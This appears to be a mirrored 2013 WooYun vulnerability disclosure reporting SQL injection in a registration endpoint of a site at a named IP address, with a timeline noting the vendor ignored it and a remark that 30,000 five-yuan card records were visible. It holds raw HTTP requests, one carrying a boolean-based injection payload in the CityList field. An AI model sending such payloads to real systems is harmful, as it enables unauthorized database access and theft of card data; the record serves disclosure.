乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-06-03: 积极联系厂商并且等待厂商认领中,细节不对外公开 2013-07-18: 厂商已经主动忽略漏洞,细节向公众公开
可以看见有30000条5元卡的记录,没有继续
POST http://124.227.190.155/Home/RegInput HTTP/1.1Content-Length: 286Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://124.227.190.155/Cookie: ASP.NET_SessionId=qeqecw0nbjqyeps0wssthdwo; LoginUserID=ImgYzm=286aHost: 124.227.190.155Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)Accept: */*Answer=1&AreaList=-1&CardNo=1&CityList=-1&ClassName=dxcbvjtn&Email=sample%40email.tst&ImgYzm=1&Question=1&SchoolList=-1&Scote=1&SubjectList=25&telno=555-666-0606&UserCode=94102&userlogin=dxcbvjtn&username=dxcbvjtn&userpass1=g00dPa%24%24w0rD&userpass2=g00dPa%24%24w0rD
POST /Home/RegInput HTTP/1.1Content-Length: 285Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://124.227.190.155/Cookie: ASP.NET_SessionId=qeqecw0nbjqyeps0wssthdwo; LoginUserID=ImgYzm=286aHost: 124.227.190.155Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)Accept: */*Answer=1&AreaList=1&CardNo=1&CityList=-1'%20or%20'59'%3d'60&ClassName=dxcbvjtn&Email=sample%40email.tst&ImgYzm=1&Question=1&SchoolList=-1&Scote=1&SubjectList=25&telno=555-666-0606&UserCode=94102&userlogin=dxcbvjtn&username=dxcbvjtn&userpass1=g00dPa%24%24w0rD&userpass2=g00dPa%24%24w0rD
未能联系到厂商或者厂商积极拒绝